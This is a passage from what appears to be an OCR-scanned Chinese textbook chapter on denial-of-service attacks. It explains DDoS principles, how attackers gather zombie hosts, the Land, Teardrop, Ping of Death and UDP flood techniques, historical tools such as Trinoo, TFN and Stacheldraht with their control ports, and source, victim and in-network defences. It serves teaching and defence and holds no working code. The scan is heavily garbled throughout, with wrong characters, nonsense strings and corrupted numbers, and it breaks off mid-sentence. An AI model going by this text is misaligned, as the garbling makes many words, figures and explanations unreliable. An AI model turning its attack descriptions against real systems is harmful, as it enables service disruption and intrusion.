为 这 是 一 个 主机 就 可 以 轻松 完成 的 工作 ,自然 无 须 多 个 主机 协同 进行 。 

分 布 式 拒绝 服务 基本 原理 使 被 攻击 服务 需 充 矿 大 量 要 求 回复 的 信息 ,网 络 市 蜗 被 消耗 ， 
系统 资源 也 同样 被 消耗 ,这 样 就 会 因为 网 络 或 系统 瘫痪 而 不 能 提供 正常 的 网 络 服务 。 

分 布 式 拒 绝 服 务 的 基本 思路 有 两 种 。 一 是 迫使 服务 冀 的 缓冲 区 满 ,不 接收 新 的 请 求 ; 
二 是 使 用 IP. 欺骗 ,迫使 服务 问 把 非法 用 户 的 连接 复位 ,影响 合法 用 户 的 连接 。 

分 布 式 攻击 大 体 可 以 分 为 四 类 : 利用 协议 中 的 漏洞 ,如 SYN-Flood 攻击 ; 利用 软件 实 
现 的 缺陷 ,如 teardrop 攻击 、land 攻击 ; 发 送 大 量 无 用 突 发 数据 攻击 耗 尽 资源 ,如 ICMP 
flood 攻击 、Connection flood 攻击 ; 其 骗 型 攻击 ,如 IP Spoofing DoS 攻击 。 


9.1.2 攻击 者 动机 


拒绝 服务 攻击 的 目的 是 多 种 多 样 的 ,不 同 的 时 间 和 场合 发 生 的 、 由 不 同 的 攻击 者 发 起 
的 、 针 对 不 同 的 受害 者 的 攻击 可 能 有 着 不 同 的 目的 。 一 次 攻击 事件 可 以 有 多 重 的 目的 ,包括 
作为 练习 攻击 的 手段 ,作为 特权 提升 攻击 的 辅助 手段 ,由 于 政治 原因 经济 原因 或 个 人 兴 

当 拒 绝 服 务 攻 击 作 为 特权 提升 攻击 、 获 得 非法 访问 的 一 种 手段 时 。 通 党 ,攻击 者 不 能 单 
纯 通 过 拒绝 服务 攻击 获得 对 某 些 系统 \ 信 息 的 非法 访问 ,但 其 可 作为 间接 手段 。 

(1) SYN 风 雄 攻击 可 以 用 于 IP 支持、IP 欺骗 等 。 当 攻击 者 想 要 问 B 冒 序 C OY. a A 
需要 C 不 能 响应 B 的 消息 ,为 此 ,攻击 者 可 以 先 攻击 C 使 其 无 法 对 B 的 消息 进行 啊 应 。 然 
后 攻击 者 就 可 以 通过 祝 听 发 回 C. 的 数据 包 , 或 者 通过 猜测 发 回 C 的 数据 包 中 的 序列 号 等 ， 
然后 冒充 C BÁR. 

(2) 一 些 系 统 在 启动 时 会 有 源 洞 ,可 以 通过 拒绝 服务 攻击 使 之 重启 ,然后 在 该 系统 重启 
时 针对 漏洞 进行 攻击 。 例 如 ,RARP-boots, 如 果 能 令 其 重启 ,就 可 以 将 其 攻破 。 只 需 知道 
RARP-boots 在 引导 时 监听 的 端口 号 ,通常 为 69。 通 过 问 其 发 送 伪 造 的 数据 包 几 乎 可 以 完 
全 控制 其 boot 引导 过 程 。 

(3) 有 些 网 络 配 置 成 当 防 火 墙 关闭 时 所 有 数据 包 都 能 通过 ,特别 是 对 于 那些 提供 服务 
比 安全 更 加 重要 的 场合 ,如 普通 的 ISP, 则 可 通过 对 防火 墙 的 拒绝 服务 攻击 使 其 失去 作用 达 
到 非法 访问 受 防火 墙 保护 的 网 络 的 目的 。 
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(4) 对 Windows 系统 的 大 多 数 配 置 变动 在 生效 前 都 需要 重启 系统 。 这 时 ,攻击 者 如 果 
已 经 获得 了 对 系统 的 管理 性 特权 的 变动 后 ,可 能 需要 采取 拒绝 服务 攻击 的 手段 使 系统 重启 - 
或 者 迫使 系统 的 真正 管理 员 重 启 系统 ,以 便 其 改动 的 配置 生效 。 

(5) 对 DNS 的 拒绝 服务 攻击 可 以 达到 地 址 冒充 的 目的 。DNS 服务 器 的 作用 是 把 域名 
解析 为 IP 地 址 。 攻 击 者 可 以 通过 把 DNS 致 次 ,然后 冒充 DNS 的 域名 解析 ,把 错误 的 域名 - 
IP 地 址 的 对 应 关系 提供 给 用 户 ,以 便 把 用 户 的 数据 包 指 加 错误 的 网 站 ,如 攻击 者 的 网 站 ,或 
者 把 受害 者 的 邮件 指 问 错误 的 邮件 服务 器 ,这 样 ,攻击 者 就 达到 了 冒充 其 他 的 域名 的 目的 。 
攻击 者 的 最 终 目的 大 致 有 两 种 : 一 是 鳃 取 受 害 者 的 信息 ,但 客观 上 导致 用 户 不 能 应 用 相应 
的 服务 ,也 构成 拒绝 服务 攻击 ; 二 是 拒绝 服务 攻击 ,如 和 冀 意 使 用 户 不 能 访问 需要 的 网 站 ,不 
能 发 送 邮 件 到 需要 的 服务 器 等 。 


9.2 DDoS 攻击 的 典型 过 程 


一 般 来 说 ,DDoS 攻击 具有 以 下 典型 过 程 。 
. 准备 阶段 ,收集 目标 信息 

通常 ,攻击 者 的 攻击 并 非 是 盲目 地 胡乱 进行 的 ,他 不 会 用 一 过 Modem 连接 的 PC 
去 彼 炸 一 个 大 型 网 站 。 为 了 达到 攻击 的 目的 ， 攻击 者 要 掌握 受害 者 的 一 些 基 本 信息 ,如 被 攻 
击 目 标 主机 的 操作 系统 .配置 .地 址 情况 .数目 .性 能 ,以 及 目标 网 络 的 带宽 等 。 因 此 ,在 攻击 
发 生前 ,攻击 者 需要 先 对 目标 进行 价 察 ,如 利用 扫描 工具 对 目标 进行 扫描 。 

2. 占领 倪 偶 机 和 控制 台 

在 DDoS t}, pos 以 通过 上 月 己 的 计算 机 直接 对 目标 发 起 攻击 ,这样 攻击 者 可 能 会 骨 


看 被 发 现 的 风险 。 通 党 ,为 了 隐 珊 日 己 不 被 发 现 ,攻击 痢 宕 要 占领 一 些 仇 仿 机 ,用 来 实施 攻 
i. A^ pdb rd 台 或 数 台 计算 机 对 一 个 大 型 系统 的 攻击 是 不 够 


的 ,因此 攻击 者 也 需要 大 量 的 盆 偶 机 用 于 增强 攻击 的 火力 ”。 这 些 仇 仿 机 最 好 具有 展 好 的 
性 能 和 充足 的 贰 源 ,如 强大 的 计算 能 力 ` 大 的 市 宽 等 ,这 样 攻击 痢 会 获得 较 大 的 攻击 力 。 当 
然 , 如 条 这 些 计算 机 的 管理 水 平 ` 安 全 程度 低 , 则 更 是 攻击 肴 的 最 佳 选 择 ,因为 这 样 的 计算 机 
蝎 容 易 镁 攻击 音 攻破 。 例 如 ,一 些 宽 市 家 性 用 户 的 系统 就 共有 局 市 宽 \ 低 安全 的 特性 ,而 且 ， 
由 于 这 些 用 户 一 般 都 会 选择 按照 年 或 月 的 方式 固定 付费 ,因此 ,他 们 的 计算 机 是 最 受 攻击 者 
至 欢 的 ,于 葛 他 们 的 计算 机 会 很 长 时 间 连 接 上 上 网。 并且, 攻击 痢 还 要 通过 命令 让 侧 仿 机 给 控 
制 侣 发送 命令 ,这 样 看 来 ,攻击 者 还 有 利用 一 些 被 攻破 的 计算 机 或 拥有 访问 权限 的 计算 机 作 
为 控制 全。 

攻击 者 占领 这 些 例 笛 机 的 一 般 方 法 是 移 通 过 扫 拉 ,得 到 一 些 容 昂 攻 破 的 计算 机 TA Je S 
用 一 些 较 为 简单 的 方法 子 以 攻破 。 此 外 ,由 于 新 的 软件 越 来 越 多 ,必然 使 整个 系统 的 许 洞 也 
越 来 越 多 ; 软件 的 漏洞 使 得 恶意 程序 可 以 月 动 地 攻 丰 大 量 的 主机 ,然后 提供 给 攻击 背 作 为 
攻击 机 使 用 。 

攻击 者 占领 倪 和 伪 机 以 后 , 再 要 在 例 熏 机 上 安放 后 门 , 以 保持 对 倪 伪 机 的 “占有 ”。 此 外 ， 
对 于 那些 攻击 者 选 作 攻击 机 的 仇 仿 机 ,攻击 者 还 需 在 上 面 安 婆 攻击 软件 。 
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3. 实施 攻击 

在 前 面 的 准备 工作 完成 之 后 ,实际 的 攻击 过 程 却 相对 比较 简单 ,攻击 者 只 需 通 过 控制 台 
问 侯 仿 机 发 出 指令 , 令 其 立即 或 在 某 个 时 间 癌 指定 的 受害 者 大 量 发 送 特定 的 攻击 数据 包 即 
可 。 或 者 攻击 者 可 以 在 倪 偶 机 上 做 一 定时 设置 ,时 间 一 到 ,这 些 倪 介 机 就 会 自行 对 既定 目标 
发 起 攻击 。 

这 里 描述 的 是 分 布 式 拒绝 服务 攻击 的 一 个 典型 过 程 , 其 示意 图 如 图 9-1 所 示 。 实 际 上 ， 
并 非 每 一 次 攻击 都 要 遵循 这 样 一 个 过 程 的 。 例 如 ,攻击 者 在 攻击 了 受害 者 A 以 后 的 某 天 打 
算 攻 击 受 害 者 B, 这 时 ,由 于 攻击 者 早已 经 了 解 了 控制 台 和 攻击 机 ,第 二 个 过 程 是 可 以 忽略 
的 。 或 者 攻击 者 对 某 些 受害 者 的 情况 已 经 了 如 指 掌 ,如 果 想 要 对 这 个 受害 者 进行 攻击 ,第 一 
个 过 程 也 就 不 再 需要 了 。 


攻击 机 
CL p L) 


控制 台 





图 9-1 典型 的 DDos 攻击 示意 图 


9.3 ”拒绝 服务 攻击 技术 及 分 类 


常见 的 拒绝 服务 攻击 技术 大 体 可 以 分 为 以 下 三 类 ，。 

CD 利用 TCP/IP 协议 进行 的 TCP DoS 攻击 ,如 SYN flood 攻击 、Land 攻击 、Teardrop 
攻击 。 

(2) 利用 UDP 服务 进行 的 UDP DoS 攻击 ,如 UDP Flood DoS KH. 

(3) 利用 ICMP 协议 进行 的 ICMP DoS 攻击 ,如 Ping of Death 攻击 Smurf 攻击 。 

1. Land 攻击 

Land 是 一 段 C 程序 ,其 向 受害 者 发 送 TCP SYN 包 , 而 这 些 包 的 源 IP 地 址 和 目的 IP 
地 址 被 伪造 成 一 样 的 ,也 就 是 受害 者 的 IP 地 址 的 源 端 口 和 目的 端口 是 相同 的 , 当 目 标 系 统 
在 收 到 这 样 的 数据 包 之 后 ,就 可 能 会 发 送 挂 起 、 骨 演 或 重启 的 状况 。 
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2. 碎片 攻击 

当 数 据 在 不 同 的 网 络 介质 之 间 传 输 时 ,由 于 不 同 的 网 络 介质 和 协议 允许 传输 的 数据 包 
的 最 大 长 度 一 一 即 最 大 传输 单元 MTU 可 能 是 不 同 的 ,在 这 种 情况 下 , 想 要 确保 数据 包 顺 利 
到 达 目 的 地 ,分 片 功 能 是 必需 的 。 当 一 个 数据 包 传 输 到 了 一 个 网 络 环境 中 ,如 来 该 网 澡 环 境 
的 MTU 小 于 数据 包 的 长 度 , 则 该 数据 包 需 要 分 片 才能 通过 该 网 络 。 为 了 使 得 同一 数据 包 
的 分 请 能 够 在 其 目的 痪 顺 利 重组 ,每 个 分 片 必 须 遭 从 以 下 规则 : 同一 数据 包 的 所 有 片段 的 
识别 号 必须 相同 。 每 个 户 段 必须 指明 其 在 原 未 分 段 的 数据 包 中 的 位 置 。 每 个 片段 必须 指明 
其 数据 的 长 度 , 以 及 说 明 其 是 否 是 最 后 一 个 片段 , 即 其 后 是 否 还 有 其 他 的 片段 。 所 有 的 这 些 
信息 都 包含 在 卫 头 中 。 下 面 的 数据 包 演 示 了 IP 分 片 的 原理 。 

以 太 网 MTU = 1500, 设 原始 数据 4028 个 字 厄 被 分 成 3 个 不 超过 1500 “AY 
片段 。 

下 面 是 用 TCP dump 得 到 的 关于 该 数据 包 分 段 的 输出 。 

ping. com > myhost.com: icmp: echo request (frag 21223:1480@0+ ) 


ping. com > myhost.com: (frag 21223:1480@1480 + ) 
ping. com > myhost.com: (frag 21223:1048@2960) 


21223 是 分 段 1D. 1480 是 前 两 个 分 段 的 长 度 ,1048 是 最 后 一 个 分 段 的 长 度 , 在 最 后 一 个 
分 段 中 可 以 看 出 数据 包 的 总 长 度 。 每 个 分 段 的 最 后 一 个 数 表 示 该 分 段 的 俩 移 。 前 两 个 分 段 
中 的 “十 ?表示 后 面 还 有 分 段 。 

如 何 进行 碎片 攻击 Teardrop。Teardrop 本 是 一 段 程 序 , 它 利用 Windows 95, Windows 
NT 和 Windows 3. 1 "PARI IP 分 厂 的 漏洞 ,向 受害 者 发 送 仿 移 地 址 重合 的 分 片 的 UDP 数 
据 包 ,使 得 目标 计算 机 在 将 分 片 重组 时 出 现 异 稼 钳 















误 ,导致 目标 系统 崩溃 或 重启 E 9-2 所 示 为 碎片 攻 
击 的 一 个 示意 。 假 设 原 始 IP 包 有 150 个 字 节 数据 

(A IP 头 ) ,该 数据 包 可 以 被 分 成 两 块 ,前 一 块 有 (b) 
120 个 字 节 , 偏 移 为 0; 后 一 块 有 30 个 字 节 , 偏 移 应 

该 为 120。 当 接收 方 收 到 数据 长 为 120 的 第 一 个 分 请 Qum o - 
EOE MERAB Amprmxodms b o M 
120 ff 4 Hr tsp. HORE oR p 28s LY HS IK BER f FO 80 — d ibo 

加 起 来 ,作为 这 两 个 分 片 的 总 长 度 ( 这 里 是 150)。 由 图 9.2 碎片 攻击 示意 图 


已 经 复制 了 第 一 个 分 片 的 120 个 字 市 ,因此 ,系统 
从 第 二 个 分 片 中 复制 150 一 120 二 30 字 节 数据 到 为 重组 开设 的 缓冲 区 中 。 这 样 ,一 切 正 稼 ， 
没有 错误 发 生 。 但 是 ,如 果 攻 击 者 刻意 修改 第 二 个 分 片 数据 包 , 使 其 数据 长 度 为 30. hg AH 
80, 则 结果 就 不 一 样 了 。 在 收 到 第 一 个 分 片 后 ,如 果 接 收 者 收 到 第 二 个 偏 移 80、 数 据 长 度 为 
30 的 分 厂 时 ， Sn mn kn FEA VS AP ot Fr HS TR RE 79 Y ED TK DAB = 
中 复制 多 少 字 节 ,系统 需要 用 总 长 度 110 减 去 第 一 个 分 片 中 已 复制 的 120 字 节 ,结果 得 到 
一 10 字 节 。 proposed 一 10 相对 于 一 个 很 大 的 整数 ,这 时 候 系统 处 理 出 
现 异 常 。 根 据 系 统 不 同 , 出 现 的 异常 情况 也 不 同 ,通常 会 发 生 IP 模块 不 可 用 ,堆栈 损坏 和 系 
统 挂 起 等 状况 。 老 版 本 的 Linux 内 核 在 处 理 重 欠 分 片 的 时 候 也 会 存在 问题 ,WindowsNT/ 
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95 在 接收 到 10 一 50 个 teardrop 分 片 时 也 会 发 生前 溃 的 情况 。 

碎片 攻击 有 其 他 几 种 的 变种 ,拒绝 服务 并 不 是 这 些 攻击 的 唯一 目的 ,如 小 片段 攻击 、 重 
登 分 片 攻击 等 。 酚 片 攻 击 示 意图 如 图 9-2 所 示 。 

3. Ping of death 攻击 

Ping of death Boa A FA Pi SE EUST BS Das el. [8] 56 A Ix dA IK AY Ping 数据 包 , 导 致 受 
害 者 系统 异常 。 根 据 TCP/IP 协议 规范 RFC791 要 求 ,数据 包 的 长 度 不 得 超过 65 535 个 字 
节 , 其 中 包括 至 少 20 个 字 节 的 包头 和 0 字 节 或 更 多 字 节 的 选项 信息 ,其 余 的 则 为 数据 。 而 
Internet 控制 消息 协议 ICMP 是 基于 IP 的 ,ICMP EZE a) IP 包 中 。ICMP 的 包头 有 8 
个 字 RFC792, 因 此 ,一 个 ICMP 包 的 数据 不 能 超过 65 535—20—8=65 507 FH., WRI 
击 者 发 送 数 据 超 过 65 507 5E B HJ Ping 包 到 一 个 有 此 漏洞 的 受害 者 , 则 受害 者 系统 可 能 会 
因此 毅 汗 、 死 机 、 重 局 等 。 事 实 上 ,对 于 有 的 系统 ,攻击 者 只 需 癌 其 发 送 载 傈 数据 超过 4000 
字 节 的 Ping 包 就 可 以 达到 目的 ,而 不 用 使 数据 超过 65 507 FH., 

4. UDP 风暴 

UDP 是 一 无 连接 的 协议 ,在 传输 数据 之 前 不 需要 如 TCP 那样 建立 连接 。 当 一 个 系统 
收 到 一 个 UDP AY , 它 会 检查 哪 种 应 用 程序 在 监听 该 端口 ,如 果 有 应 用 程序 监听 , 则 把 数 
据 交 给 该 应 用 程序 处 理 ,如果 没 有 应 用 程序 监听 该 端口 , 则 回应 一 个 ICMP 包 说 明 目 标 不 可 
ik, UDP 风 骏 通常 的 主要 目的 是 占用 网 络 市 宽 , 达 到 阻塞 网 络 的 目的 ,因此 通常 UDP JA E 
攻击 的 数据 包 会 比较 长 。 当 然 ,UDP 风 骏 也 可 以 用 来 攻击 终端 市 点 ,如 果 在 受害 者 的 网 络 
Zim 3 à, Mb Eg ALS HJ UDP 包 , 受 害 者 的 系统 就 存在 毅 汗 的 可 能 。 可 以 在 市 宽 较 高 的 市 
点 上 设置 过 滤 UDP 的 数据 包 以 对 付 UDP 风 姑 。 因 为 很 多 终端 节点 不 需要 和 定期 收集 UDP 

5. DOS 攻击 工具 举例 

(1) Trinoo, Trinoo 也 称 为 Trin00 ,是 发 现 最 早 的 DDoS 工具 之 一 ,在 1999 年 6 月 就 
出 现 了 。Trinoo 的 攻击 采用 的 是 UDP 风暴 ,其 攻击 者 到 控制 台 的 通信 通过 TCP 端口 
27 665 进行 通信 ,控制 台 到 攻击 主体 (Agents、Deamon) 的 通信 通过 UDP 端口 27444 进行 通 
信 ,而 攻击 机 到 控制 台 的 通信 则 通过 UDP 端口 31 335 进行 通信 。 

(2) TFN, TFN(The Tribe Flood Network) 的 出 现 是 在 Trinoo 之 后 ,TFN 的 控制 台 
和 攻击 主体 构成 的 攻击 网 络 能 够 实施 多 种 攻击 ,如 ICMP US. SYN JUGE, UDP 风 骏 和 
SMURF 等 。TFN 与 trinoo 有 较 大 的 区 别 ,其 攻击 者 .控制 台 、 攻 击 主 体 之 间 的 通信 采用 
ICMP ECHO 和 ECHO REPLY 消息 。 在 TEN 中 ,攻击 者 到 控制 台 的 通信 采用 的 是 明文 
方式 , 即 没有 加 密 处 理 ,容易 受到 标准 的 TCP 攻击 ,如 会 话 劫持 (session hijacking)、RST f& 
Wt RST sniping). TFN 的 控制 人 台 到 攻击 机 的 通信 通过 ICMP ECHO REPLY 包 。 由 于 
有 些 协议 监视 工具 不 截取 ICMP 包 , 因 此 TEN 不 依赖 于 TCP 和 UDP 进行 通信 的 特征 ,使 
其 在 某 些 情况 下 更 不 易 被 发 现 。 

(3) Stacheldraht。Stacheldraht 在 德语 中 是 指 市 刺 的 网 线 “barbed wire”, 出 现 于 1999 
年 夏天 ,其 集合 了 Trinoo 和 TEN 的 某 些 特征 并 有 一 些 更 高 级 的 特征 ,如 控制 台 对 攻击 者 的 
认证 需要 攻击 者 提供 口令 (这 个 口令 在 回 控制 台 发 送 的 过 程 中 是 通过 Blowfish Jill 25 AY . T5 
制 台 和 攻击 机 之 间 的 所 有 通信 都 采用 Blowfish 加 密 ) .攻击 机 可 以 自动 升级 等 。 
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Stacheldraht 的 攻击 者 回 控 制 台 的 联系 通过 TCP m O 16660 ,控制 台 到 攻击 机 的 联系 
通过 TCP 端口 ,反方 同 的 联系 则 通过 ICMP ECHO REPLY. 

与 TEN 一 样 , Stacheldraht 可 以 实施 的 攻击 有 ICMP X 2S, SYN 风 骏 、UDP JA 2S, 
SMURF 等 。1999 年 9 月 底 到 10 月 初 ,Stacheldraht 在 欧洲 和 美国 正式 登场 ,CERT HE 
的 出 现 发 布 了 事件 通报 IN-99-04。Stacheldraht 的 攻击 程序 最 早 发 现 于 一 些 Solaris 2.x A 
统 上 ,这 些 系 统 是 因为 RPC 服务 (如 statd cmsd 和 ttdbserverd 的 缓存 洲 出 ) 漏 洞 而 被 攻 
破 的 。 

(4) Trinity, Trinity 可 实施 多 种 风 骏 型 攻击 ,包括 UDP、SYN、RST、ACK 等 。 从 攻击 
者 或 控制 台 到 攻击 主体 的 通信 和 则 是 通过 即时 通信 (JInternet Relay Chat,IRC) 或 美国 在 线 
(AOL) AY ICQ. Trinity 也 是 最 早 利用 IRC 进行 控制 的 DDoS 工具 之 一 。Trinity 最 早 用 的 
是 端口 号 6667, 并 且 有 一 个 后 门 程序 监听 TCP 端口 33270。 

(5) Shaft。Shaft 最 早出 现 于 1999 年 11 月 。 一 个 Shaft 网 络 看 起 来 与 trinoo 的 网 络 
类 似 , 在 控制 台 和 攻击 机 之 间 的 通信 采用 的 是 UDP 协议 (控制 台 到 攻击 机 的 通信 用 端口 
18753 ,相反 方向 用 端口 20433) 。 攻 击 者 可 以 控制 攻击 类 型 .攻击 包 的 大 小 和 攻击 时 间 的 长 
Ab. Shaft 的 一 个 典型 的 特征 是 其 TCP 包 的 序列 号 都 是 0x28374839 。 

(6) TFN2K。TFN2K(Tribe Flood Network 2K) 于 1999 年 12 月 发 布 。 TFN2K 是 在 
TEN 上 发 展 起 来 的 变种 ,有 很 多 新 的 特征 使 得 其 通信 更 加 难以 识别 和 过 滤 , 如 命令 可 以 远 
程 执行 .通过 地 址 伪造 掩 闭 攻 击 源 ,并 能 通过 多 种 协议 (如 UDP, TCP 和 ICMP) 进 行 通信 。 
TFN2K 除了 可 以 实施 TEN 已 有 的 攻击 外 ,还 可 以 通过 发 送 如 Teardrop 和 Land 攻击 那样 
的 异 痢 数据 包 ,使 得 党 害 者 系统 不 稳定 或 朋 浊 。 

(7) Stream/mstream。 与 其 他 的 工具 相 比 ,mstream 比较 初级 ,其 程序 中 有 不 少 的 错 
Ve ,其 控制 功能 也 相对 单一 。 然 而 , 它 也 像 其 他 工具 一 样 ,会 给 受害 月 市 来 很 大 的 灾难 。 

(8) jolt2, jolt2. c 是 在 一 个 死 循环 中 不 停 地 发 送 ICMP/UDP 的 IP MH. BY LA 
Windows 系统 的 计算 机 死 锁 。 经 测试 ,未 打 补 丁 的 Windows 2000 但 到 其 攻击 时 ,CPU Al 

用 率 会 立即 上 升 到 10096 ,鼠标 指针 无 法 移动 。 

jolt2 的 危害 较 大 ,其 通过 不 停 地 发 送 IP 碎片 数据 包 , 不 仅 死 锁 未 打 补 丁 的 Windows 
系统 ,同时 也 大 大 增加 了 网 络 流 量 。 曾 经 有 人 利用 jolt2 模拟 网 络 流量 ,测试 IDS 在 高 负载 
流量 下 的 攻击 检测 效率 ,就 是 利用 这 个 特性 。 


9.4 拒绝 服务 攻击 的 防范 


对 于 拒绝 服务 攻击 而 言 ,目前 还 没有 比较 完善 的 解决 方案 。 拒 绝 服务 攻击 尤其 是 分 布 
式 风 骏 型 拒绝 服务 攻击 是 与 目前 使 用 的 网 络 协 议 密 切 相 关 的 , 它 的 彻 瓜 解决 即使 不 是 不 可 
能 的 ,至 少 也 是 极为 困难 的 。 此 外 ,安全 具有 整体 、 人 全面. 协同 的 特性 ,这 一 特性 在 拒绝 服务 
攻击 方面 体现 得 尤为 突出 ,没有 整个 网 络 社 会 的 齐心 协力 、 共 同 应 对 ,拒绝 服务 攻击 始终 是 
摆 在 人 们 面前 的 难题 。 

里 然 如 此 ,人 们 对 拒绝 服务 攻击 也 不 是 一 点 办 法 都 没有 ,人 研究 人 员 也 在 不 断 地 寻求 新 的 
解决 方案 。 对 于 传统 技术 而 言 ,可 以 加 固 操作 系统 ,如 配置 操作 系统 各 种 参数 ; 利用 防火 
het » 401 Random Drop 算法 .SYN Cookie 算法 ; 负载 均衡 技术 ; 市 蜗 限 制 和 QoS 保证 ,如 对 
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报 文 种 类 、 来 源 等 各 种 特性 设置 阔 值 参数 。 拒 绝 服务 攻击 的 对 策 主要 可 以 分 为 3 个 方面 
防御 、 检 测 和 追踪 。 


9.4.1 拒绝 服务 攻击 的 防御 


将 拒绝 服务 攻击 的 防御 问题 分 为 源 端 防御 、 终 病 防 御 和 中 端 防御 3 个 方面 。 

源 闪 指 的 是 攻击 数据 的 发 出 端 , 如 果 是 攻击 者 直接 发 送 攻击 数据 包 , 则 源 端 指 的 是 攻击 
者 所 在 的 网 络 , 如 果 攻 击 者 不 是 耳 接 攻击 而 是 通过 倪 仿 机 , 则 源 端 就 是 指 倪 仿 机 所 在 的 网 
络 。 这 里 “ 源 ” 是 对 于 数据 包 来 说 的 。 中 端 是 在 中 间 的 网 络 , 既 不 受 源 新 控制 ,也 不 受 终 六 控 
制 ,起 到 的 作用 就 是 传输 数据 包 , 从 源 端 到 终端 的 数据 包 就 要 经 过 中 问 。 终 闹 分 为 两 种 情 
况 ,一 种 是 当 目 标 是 主机 的 时 候 , 终 问 包 括 受 害 者 主机 和 受害 者 所 在 的 网 络 ; 男 一 种 是 当 目 
标 是 受害 者 审 客 时, 终 问 就 是 目标 网 络 。 受 害 者 的 利益 用 ISP 代表 ,在 适当 的 时 候 ,ISP 还 
可 以 癌 受 害 者 提供 防御 服务 。 所 以 ,这 种 情况 下 ISP 也 可 以 成 为 拒绝 服务 的 “终端 ”。 

1. 源 端 防御 

拒绝 服务 攻击 的 源 端 防御 是 指 在 发 出 攻击 性 数据 包 的 源 端 (实际 上 ,如 果 是 利用 倪 仿 机 
攻击 ,这 个 过 程 部 不 是 源 端 ,仅仅 是 处 在 中 间 , 只 有 攻击 者 从 日 己 的 主机 发 起 和 耻 接 攻击 的 时 
修 , 数 据 包 的 源 问 才 是 整个 过 程 的 源 端 ) 所 采取 的 防御 撞 施 。 在 终 问 防御 部 分 中 , 际 流 量 控 
制 和 元 余 备 份 外 ,还 有 其 他 的 提高 主机 安全 性 的 方法 ,如 经 常 进行 攻击 测试 .病毒 防护 ge 
进行 如 口 扫 拉 .关闭 不 需要 的 服务 和 端口 . 打 好 安全 补丁 等 也 都 适用 于 源 病 防护 ,因为 这 些 
方法 可 以 减少 主机 被 攻击 者 攻破 以 作为 便便 机 的 可 能 性 。 同 时 , 源 问 防御 也 包括 倪 介 机 的 
检测 与 清除 ,因为 倪 仿 机 也 是 发 出 数据 包 的 源 问 。 

2. 终端 防御 

终 并 防 御 是 指 在 最 终 受 害 者 处 ,包括 受害 者 主机 、 受 害 者 网 络 , 其 至 受害 者 的 ISP 等 处 
可 以 米 取 的 防御 措施 。 过 小 恶意 的 数据 包 、 提 高 主机 与 网 络 安全 性 ,以 及 增强 容 候 性 等 都 可 
以 作为 拒绝 服务 的 终 痪 防御 对 各 。 终 病 防 御 技 术 可 以 掌握 在 党 害 者 上 月 身 的 手中 ,并 且 由 党 
害 者 日 号 实施 ,这 样 就 减少 了 其 他 方面 的 配合 ,这 是 终端 防御 技术 的 一 个 重要 优点 。 但 是 ， 
只 有 在 攻击 力度 比较 小 的 时 候 才 有 用 ,这 也 成 为 终端 防御 的 一 个 重要 缺点 。 当 出 现 大 流量 
的 拒绝 服务 攻击 的 时 候 , 这 种 防御 技术 就 没 用 了 。 因 为 大 流量 的 攻击 还 未 达到 防御 系统 的 
时 候 ,受害 者 的 防御 系统 就 已 经 消耗 完了 所 有 的 网 络 资源 ,使 受害 者 在 网 络 中 消失 。 

一 般 来 说 ,在 源 端 防御 拒绝 服务 攻击 ,具有 很 多 的 优势 ,如 避免 拥塞, 在 接近 数据 源 端 限 
制 攻 击 数据 流 可 以 避免 其 拥塞 网 络 , 因 为 这 些 攻击 数据 流 非 但 是 无 用 的 ,而 且 是 极为 有 害 
的 ,对 于 除 有 党 害 者 外 的 中 间 网 络 HE a a IS Bea | EE AC ain BC EY HE Jy g E E 
挥 , 其 占用 的 网 络 资 源 将 降 到 尽量 低 。 

在 源 端 防御 拒绝 服务 攻击 有 较 小 的 副作用 ,很 多 抗 DDoS 攻击 系统 应 对 攻击 的 方法 是 
对 流 回 受害 者 的 所 有 的 通信 进行 限 流 或 过 滤 。 这 样 ,正常 用 户 与 受害 者 的 通信 和 就 会 受到 较 
大 的 影响 。 防 御 撞 施 愈 徘 近 数据 源 ,其 波及 的 其 他 正常 用 户 愈 少 。 

在 源 端 防御 拒绝 服务 攻击 更 多 人 妃 踊 ,由 于 徘 近 数 据 源 , 在 追查 攻击 来 源 或 进行 类 似 调 查 
时 会 更 为 有 利 。 除 此 之 外 ,在 源 端 防御 拒绝 服务 攻击 可 以 使 用 更 为 复 洒 的 检测 算法 。 由 于 
离 数 据 源 近 的 路 由 各 转发 的 数据 量 通 党 比 中 辐 的 路 由 问 转 发 的 数据 量 要 小 ,这 样 ,这 些 足 由 
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需 可 以 应 用 较 多 的 资源 于 DDoS 防御 ,从 而 可 以 采用 更 为 复杂 的 检测 算法 。 

3. 中 端 防御 

拒绝 服务 攻击 的 中 端 防御 是 指 在 攻击 性 数据 包 的 发 送 途 中 采取 的 防范 措施 。 一 般 而 
言 ,在 中 端 主干 路 由 需 的 通信 量 比较 大 ,所 以 往往 没有 足够 的 资源 用 来 防御 除 它 自身 之 外 的 
网 络 攻 击 。 因 此 ,这 方面 的 研究 相对 较 少 。 其 中 , 葵 止 转发 直接 的 广播 包 通过 主干 路 由 豆 ， 
并 且 基 于 路 由 的 过 滤 也 是 属于 这 类 。 因 为 之 前 的 叙述 部 很 容易 看 懂 , 无 须 袭 述 , 所 以 本 市 主 
要 讨论 后 者 。 

基于 路 由 的 分 布 式 包 过 滤 (DPF) 是 指 路 由 融 知 道 网 络 的 连接 特征 和 网 络 拓 扑 结 构 , 通 
过 已 知 的 路 由 信息 ,判断 数据 包 中 的 源 IP 地 址 和 目的 IP 地 址 是 否 是 伪造 的 ,如 果 是 不 合法 
的 ,就 舍弃 该 包 , 如 图 9-3 所 示 。 一 个 自治 网 段 (ASs) 只 能 判别 和 丢弃 一 小 部 分 伪造 的 数据 
包 , 如 果 所 有 的 自治 网 段 和 其 路 由 此 都 实行 了 基于 路 由 的 分 布 式 包 过 滤 , 则 不 会 有 伪造 的 
IP 数据 包 进 入 网 络 ( 际 非 攻 击 者 将 源 IP 地 址 伪造 为 属于 他 所 在 日 治 网 段 的 IP 地址 ) ,此 法 
的 效果 不 超过 普遍 实行 入口 过 滤 所 得 到 的 效果 。 这 个 方法 的 最 大 的 优点 在 于 部 分 覆盖 或 实 
施 一 一 只 需 占 大 约 18% 的 AS 拓扑 结 构 , 就 可 以 防止 伪造 TP 地 址 的 数据 包 到 达 其 他 的 自治 
网 段 。 






| 3 
2 
— ATRE 一 一 一 攻击 (伪造 ) ~~~ = SPD ASHER Ae 
数据 流 数据 流 
图 9-3 基于 路 由 的 分 布 式 包 过 滤 
该 方法 有 以 下 缺陷 。 


首先 ,主要 的 问题 还 是 在 于 实现 问题 ,在 现 有 AS 超过 10 000 的 情况 下 ,必须 有 至 少 
